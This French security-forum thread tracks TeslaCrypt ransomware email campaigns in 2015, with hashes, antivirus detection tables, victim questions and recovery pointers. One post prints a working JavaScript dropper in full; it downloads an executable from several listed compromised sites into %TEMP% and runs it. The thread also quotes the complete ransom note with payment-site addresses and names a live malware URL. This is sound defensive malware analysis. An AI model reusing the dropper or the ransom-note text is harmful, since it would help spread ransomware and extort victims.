Mail malicieux : TeslaCrypt Ransomware (virus RSA 4096)

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Mail malicieux : TeslaCrypt Ransomware (virus RSA 4096)

Message par Malekal_morte » 29 oct. 2015 20:39

Le tristement célèbre Ransomware TeslaCrypt (aka Virus RSA 4096) fait un retour en modifiant l'extensions des fichiers en .jpg (l'extension utilisée change régulièrement).

Cette variante de TestlaCrypt - Virus RSA 4096 revient avec une méthode de chiffrement (cryptage) bien plus robuste depuis Janvier qui ne permet plus de récupérer les documents.

Notre dossier sur les rançongiciels chiffreurs de fichiers

Avril 2016, un nouveau "Virurs RSA-4096" dit Ransomware RSA-4096 - CryptXXX qui reprend les fichiers intructions de TeslaCrypt et peut semer la confusion.
La page suivant décrit les différentes entre ces deux familles : Les virus RSA-4096

~~

Historique de la campagne ransomware RSA-4096 (variante TeslaCrypt)

Rendez-vous sur la fiche TeslaCrypt : Fiche TeslaCrypt.

Récapitulatif des campagnes TeslaCrypt Décembre 2015 :
how_recover : TeslaCrypt extension .vvv.

L'activité de TeslaCrypt sur abuse.ch :

Image

Se protéger des scripts malicieux sur Windows permet d'empếcher l'installation du ransomware TeslaCrypt comme le montre cette vidéo avec le Ransomware Locky, le principe reste le même :



Schéma d'une campagne email malicieux TeslaCrypt (source threatpost.com :

Image

Liens externes relatifs au ransomware TeslaCrypt (Virus RSA-4096)

Liens de désinfection ransomware TeslaCrypt variante RSA-4096 - extensions .vvv : Récupération des fichiers .vvv

Se reporter à la procédure : Décrypter/récupérer les fichiers en extension .vvv.

Image

Image

La récupération des fichiers avec les extensions .jpg est impossible.

Conseils et sécurité

Les conseils de sécurité en lien avec les ransomwares : Comment sécuriser mon Windows[/list]

Limiter la portée des scripts malicieux avec marmiton :

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc

Message par Malekal_morte » 09 nov. 2015 20:11

Exemple d'images chiffrées avec la fameuse d'extensions .ccc de TeslaCrypt :

Image

et les instructions HOW_TO_RESTORE_FILES :

Image

HOW_TO_RESTORE_FILES en image :

Image

HOW_TO_RESTORE_FILES au formate texte :

Image

Le contenu des instructions HOW_TO_RESTORE_FILES au format Texte :
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do ?
____________________________________________________________________________________________________________________________________________
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
____________________________________________________________________________________________________________________________________________

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1. http://hfy28djd6dh.rg7hdts4d2sjfy.com/1717617A27149ED
2. http://fg347djvb.poin84mdgu9e.com/1717617A27149ED
3. https://3st7uyjfocyourll.onion.to/1717617A27149ED

If for some reasons the addresses are not available, follow these steps:
1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: 3st7uyjfocyourll.onion/1717617A27149ED
4. Follow the instructions on the site.

IMPORTANT INFORMATION:
Your personal pages:
http://hfy28djd6dh.rg7hdts4d2sjfy.com/1717617A27149ED
http://fg347djvb.poin84mdgu9e.com/1717617A27149ED
https://3st7uyjfocyourll.onion.to/1717617A27149ED
Your personal page (using TOR): 3st7uyjfocyourll.onion/1717617A27149ED
Your personal identification number (if you open the site (or TOR 's) directly): 1717617A27149ED
HOW_TO_RESTORE_FILES se lance au démarrage, car dans le dossier démarrage (Menu Démarrer / Tous les programmes / Démarrage) :

Image

La détection du sample observé :
SHA256: eed0eed86632ea74289e4ab2fccd0dcb27b5a9b754a7f6fc23287720cb7c38bd
Nom du fichier : bbhiy-a.exe
Ratio de détection : 31 / 54
Date d'analyse : 2015-11-09 17:52:00 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
ALYac Trojan.GenericKD.2852538 20151109
AVG Crypt5.KBN 20151109
AVware Trojan.Win32.Generic!BT 20151109
AhnLab-V3 Win-Trojan/Malpacked6.Gen 20151109
Arcabit Trojan.Generic.D2B86BA 20151109
Avast Win32:Malware-gen 20151109
Avira TR/Crypt.ZPACK.203958 20151109
Baidu-International Trojan.Win32.Filecoder.EM 20151109
BitDefender Trojan.GenericKD.2852538 20151109
DrWeb Trojan.Encoder.2883 20151109
ESET-NOD32 Win32/Filecoder.EM 20151109
Emsisoft Trojan.GenericKD.2852538 (B) 20151109
F-Secure Trojan.GenericKD.2852538 20151109
Fortinet W32/Filecoder.EM!tr 20151109
GData Trojan.GenericKD.2852538 20151109
Ikarus Trojan.Win32.Filecoder 20151109
K7AntiVirus Trojan ( 004b56ff1 ) 20151109
K7GW Trojan ( 004b56ff1 ) 20151109
Kaspersky UDS:DangerousObject.Multi.Generic 20151109
Malwarebytes Ransom.TeslaCrypt 20151109
McAfee GenericR-EZE!2E7F7CC9A815 20151109
McAfee-GW-Edition Artemis!Trojan 20151109
MicroWorld-eScan Trojan.GenericKD.2852538 20151109
Microsoft Ransom:Win32/Tescrypt!rfn 20151109
NANO-Antivirus Trojan.Win32.Encoder.dyntfa 20151109
Panda Trj/Genetic.gen 20151109
Sophos Mal/Generic-S 20151109
Symantec Trojan.Gen 20151109
Tencent Win32.Trojan.Inject.Auto 20151109
VIPRE Trojan.Win32.Generic!BT 20151109
nProtect Trojan.GenericKD.2852538 20151109
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Spci@list
Messages : 1
Inscription : 13 nov. 2015 15:45

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc

Message par Spci@list » 13 nov. 2015 15:58

Bonjour,

J'ai lu attentivement les infos sur TeslaCrypt et j'ai malheureusement lu que le décryptage était impossible !
Est ce définitif ou il y a t il un espoir ?

J'ai un PC portable infecté par ce ransomware, tout est crypté en .ccc

Je souhaitais juste préciser que j'ai découvert dans l'arborescence des répertoire utilisateur un fichier nommé "recover_file_asuplxxty " qui contient une suite de caractères alphanumériques.

Ce fichier peut il être utile à quelque chose pour décrypter, est ce une clé (comme les .dat) ?

A qui puis je transmettre ce fichier et des exemple de fichiers cryptés pour analyser la situation ?

Merci de vos éclaircissements si vous en avez.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc

Message par Malekal_morte » 17 nov. 2015 16:33

De l'espoir il y en a toujours mais à ce jour, clairement, il n'y a pas de solution.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .vvv

Message par Malekal_morte » 03 déc. 2015 12:12

Sur le forum quelques sujets concernant des infections Ransomwares.

Image

Reçu aujourd'hui, email malicieux
Simplement avec un fichier part1.zip

Image

Ce dernier renferme un bout de code JavaScript... remarquez, ça change des VBS.

J'en profite pour vous indiquer la lecture du billet Raise of the javascript droppers concernant l'émergence de ces derniers, même si ce n'est pas vraiment nouveau puisque des campagnes d'emails malicieux de rogues en utilisaient déjà, comme Malware Defender par exemple.

Image

La détection :
SHA256: e7ee4be1ef81144f07e9bb4884f34ce8456aaaa1bec900f63b63864fed7c61a3
Nom du fichier : part1.js
Ratio de détection : 7 / 55

Antivirus Résultat Mise à jour
AVG JS/Downloader.Agent 20151203
BitDefender JS:Trojan.Script.CQX 20151203
Emsisoft JS:Trojan.Script.CQX (B) 20151203
GData JS:Trojan.Script.CQX 20151203
Kaspersky HEUR:Exploit.Script.Generic 20151203
McAfee-GW-Edition BehavesLike.JS.ExploitBlacole.xv 20151203
MicroWorld-eScan JS:Trojan.Script.CQX 20151203
Image

Image

Les URLs malicieuses ne sont pas difficiles à obtenir :

Code : Tout sélectionner

var b = "bfcaterers.com/wp-includes/certificates/73.exe? baneyconstruction.com/kldf/cachec50da2243ebb9d634cfad3427cafcc61/73.exe? 74.117.183.84/73.exe? betterhealth4us.com/wp-includes/fonts/73.exe?".split(" ");

var sdf =((1/*s147414895596n214096uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var ws = WScript.CreateObject(sdf);
var fd = "%TEMP%\\";
var fn = ws.ExpandEnvironmentStrings(fd);
var bim = "2.XMLH";
var poh = bim + "TTP";
var as = true  , sdfs = "ADOD";
var xo = WScript.CreateObject("MS"+"XML"+(727162, poh));
var xa = WScript.CreateObject(sdfs + "B.St"+(260558, "ream"));
var ld = 0;
var n = 1;

for (var i=ld; i<b.length; i++)  {
  var dn = 0;
  try  {
	poi = "GET";	 
    xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100)  {
      xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000)  {
        dn = 1; xa.position = 0; xa.saveToFile/*d695247s*/(fn/*d494620s*/+n+".exe",4-2); try  {
          if (((new Date())>0,7547904888)) {
		    ws./*d692786s*/Run(fn+n+/*d829530s*/".exe",/*d702073s*/3-2,0); 
		    break;
          }
		}
        catch (er)  {
		}; 
      }; xa.close(); 
    }; 
	if (dn == 1)  {
      ld = i; break; 
    }; 
  }
  catch (er)  { 
  }; 
}; 
Le fichier téléchargé appartient à la famille des "Trojan.Crypto".
SHA256: b43eb03c3df9db7399d108a19101f8541c4e905c20cd634927796c02da6fbc16
Nom du fichier : engcm-a.exe
Ratio de détection : 5 / 54

Antivirus Résultat Mise à jour
Avast Win32:Malware-gen 20151203
Fortinet W32/CryptoLocker.CL!tr 20151203
Kaspersky UDS:DangerousObject.Multi.Generic 20151203
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151203
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151203
Image

Celui-ci est une variante du rançongiciel chiffreur TestlaCrypt

Image

Image

On y voit nettement les fameuses extensions en .vvv
Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 04 déc. 2015 12:33

La campagne d'emails avec du JavaScript malicieux continue pour pousser le ransomware TestlaCrypt.

Image

Image

Une détection pour le Javascript.Downloader \o
SHA256: 2ff42cab271bd36b022f9c98290f2c2a5b6166d1fe77aeb4345165b9d4c72b88
Nom du fichier : doc_XB3XXw7JsWc.js
Ratio de détection : 1 / 54
Date d'analyse : 2015-12-04 10:25:23 UTC (il y a 1 minute)
at Mise à jour
DrWeb JS.DownLoader.570 20151204
et le dropper TestlaCrypt :
SHA256: bb1bc9d48333b6f42426b78a038bc514542848e43cb72183de723f2e532c2cf5
Nom du fichier : 73.exe
Ratio de détection : 5 / 55
Date d'analyse : 2015-12-04 10:10:26 UTC (il y a 21 minutes)

Antivirus Résultat Mise à jour
CMC Trojan.Win32.Swizzor.1!O 20151201
ESET-NOD32 a variant of Win32/Kryptik.EHDW 20151204
McAfee-GW-Edition BehavesLike.Win32.PackedAP.fh 20151204
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151204
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151204
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions en .vvv

Message par Malekal_morte » 07 déc. 2015 20:31

Microsoft a ajouté TeslaCrypt au MSRT en Octobre. Bien sûr, ça ne changera pas grand chose car une fois que les fichiers ont été chiffrés Microsoft ne pourra rien faire pour vous, ils seront définitivement perdus.
=> http://blogs.technet.com/b/mmpc/archive ... crypt.aspx

Quelques chiffres sur la campagne TeslaCrypt
TeslaCrypt_propagation_MS.png
Campagne TeslaCrypt
La répartition de la campagne TeslaCrypt par pays en septembre.
On note que la France est en 8e position derrière le Brésil.
Les pays anglo-saxons sont aussi fracassés, l'Italie aussi.
TeslaCrypt_propagation_repartition_pays.png
Campagne TeslaCrypt par pays
Dans l'ensemble, les ransomwares gagnent du terrain, il y a des tentatives d'introduction de ransomwares parmi les appareils mobiles et à plus long terme, il y a de fortes probabilités de voir émerger des ransomwares capables de paralyser nos objets connectés dans l'Internet des Objets (IdO).
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 27081
Inscription : 28 févr. 2008 14:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par angelique » 07 déc. 2015 20:59

Vu que L'idO ne se concentre pas et que les objets n'abordent pas suffisamment l'aspect sécurité, tu as parfaitement raison Mak ;) Qu'est-ce que ça va débouler dans moins de 6 mois \o
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!
Image
---------------------------------------------------------------------------------------------------------------------
ZIK.:: R00tsL3gacy Reggae141.com
ZIK.:: LaGr0sseRadi0

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 09 déc. 2015 18:05

Les campagnes TeslaCrypt continuent :

Image

Sur un sample, sur VirusTotal, on obtient :
HA256: e964c8dd0c93e00fed20b5c2dd30c515e8778a5bc9010e0dfe31380ae3e2e099
Nom du fichier : 86.exe?1
Ratio de détection : 5 / 54
Date d'analyse : 2015-12-09 15:34:22 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
AhnLab-V3 Win-Trojan/Teslacrypt.Gen 20151209
Bkav HW32.Packed.AA91 20151209
Kaspersky UDS:DangerousObject.Multi.Generic 20151209
McAfee-GW-Edition BehavesLike.Win32.Downloader.fh 20151209
Qihoo-360 HEUR/QVM20.1.Malware.Gen 20151209
sur l'URL :
URL: http://softextrain64.com/86.exe
Ratio de détection : 4 / 66
Date d'analyse : 2015-12-09 15:33:19 UTC (il y a 26 minutes)
Analyse de fichier : Allez à l'analyse du fichier téléchargé

URL Scanner Résultat
Sophos Malicious site
Websense ThreatSeeker Malicious site
Fortinet Malware site
Kaspersky Malware site
Là on se dit bouh les antivirus craignent...

Image

Sauf qu'en réalité, par exemple, Avast! top le fichier en Win32:Evo-Gen [Susp]

Image

Qu'en est-t-il de Microsoft Security Essentials qui dit avoir ajouté le malware dans son MSRT.
(voir édition au dessus).
Antivirus dont je ne ne suis pas très fan...

MSE ne bronche pas au lancement de l'exe...

Image

qui continue à s'installer...

Image

Un message avec les instructions s'affiche à la stupéfaction de la victime.

Microsoft Security Essentials (MSE) indique "État du PC : Protégé"
Image

D'après Microsoft, "Votre PC est protégé et sous surveillance."
TeslaCrypt vient de terminer de chiffrer tous vos fichiers, ils sont désormais irrécupérables.

Security Alert - Infections rise spam campaign hits companies Europe
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 16 déc. 2015 20:12

Les campagnes d'email malicieux continuent, depuis hier, ce sont aussi des fichiers Word malicieux qui sont envoyés en pièce jointe.
TeslaCrypt_campagne_Word_malicieux.png
TeslaCrypt Campagne Word Malicieux.
La détection VirusTotal du dropper :
SHA256: e81173dd782598a3525c316e17cebe599dd4f60f2d4c8c28b73ddea43245bfb6
Nom du fichier : 97.exe
Ratio de détection : 8 / 54
Date d'analyse : 2015-12-16 17:57:28 UTC (il y a 1 minute)

Antiy-AVL Trojan/Win32.TSGeneric 20151216
ESET-NOD32 Win32/Filecoder.EM 20151216
Kaspersky UDS:DangerousObject.Multi.Generic 20151216
Malwarebytes Ransom.TeslaCrypt 20151216
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.fh 20151216
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151216
Rising PE:Trojan.Kryptik!1.A31F [F] 20151216
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151216
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 17 déc. 2015 13:56

ESET publie une étude sur la campagne de mails malicieux poussant le ransomware TeslaCrypt appelé JS/TrojanDownloader.Nemucod.

D'après les chiffres remontés, cette campagne représente plus de 10% des détections.
Le Japon est le pays le plus touché.
En Europe, l'Espagne et l'Italie sont en têtes.

trojan_JS_nemucod_grafica.png
Campagne JS/TrojanDownloader.Nemucod pour TeslaCrypt
trojan_JS_nemucod_grafica_2.png
Campagne JS/TrojanDownloader.Nemucod pour TeslaCrypt
Source :
http://www.welivesecurity.com/2015/12/1 ... und-world/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 21 déc. 2015 17:58

Les campagnes d'emails malicieux sont maintenant à l'arret.
La distribution de TeslaCrypt se fait maintenant à travers des Web Exploits (via Angler EK).
=> how_recover : TeslaCrypt extension .vvv.

et cela fonctionne :

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

jljljl
Messages : 1
Inscription : 24 déc. 2015 14:13

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par jljljl » 24 déc. 2015 14:23

La procedure de decryptage des fichiers vvv est ici:
https://github.com/googulator/teslacrack

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 25 déc. 2015 19:23

Merci,
Ca tourne depuis quelques heures sur la VM.
On verra ce que cela donne.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85085
Inscription : 10 sept. 2005 13:57
Contact :

Re: TeslaCrypt Ransomware - fichiers en extensions .ccc et .

Message par Malekal_morte » 26 déc. 2015 12:57

Je cherche des gens (il faut avoir un minimum de connaissances informatiques) pour tester une procédure de récupération de fichiers .vvv ( voir : recuperation-fichiers-vvv-ransomware-te ... 53866.html )
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Répondre

Revenir vers « Actualité & News Informatique »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 0 invité